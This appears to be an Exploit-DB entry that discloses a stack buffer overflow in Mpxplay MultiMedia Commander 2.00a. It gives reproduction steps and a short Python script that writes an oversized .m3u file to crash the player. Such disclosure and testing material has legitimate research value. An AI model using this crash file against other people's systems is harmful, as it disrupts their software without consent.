Mpxplay MultiMedia Commander 2.00a - '.m3u' Stack Buffer Overflow (PoC)

Author: Un_N0n
type: dos
platform: windows
port: 
date_added: 2015-09-01  
date_updated: 2015-09-01  
verified: 0  
codes: OSVDB-126926  
tags:   
aliases:   
screenshot_url:   
application_url: http://www.exploit-db.comMpxplay_MMC_v200a.zip  

raw file: 38053.txt  
********************************************************************************************
# Exploit Title: Mpxplay Multimedia Commander Stack-based BOF
# Date: 9/1/2015
# Exploit Author: Un_N0n
# Software Link: http://sourceforge.net/p/mpxplay/activity?source=project_activity
# Version: V2.00a
# Tested on: Windows 7 x86(32 BIT)
********************************************************************************************

[Steps to Produce the Crash]:
1- open 'mpxp_mmc.exe'.
2- Browser Crash.m3u in audio player.
~ Software will Crash.

[Code to produce crash.txt]:
junk = "A"*66666
file = open("CRASH.m3u",'w')
file.write(junk)
file.close()
**********************************************************************************************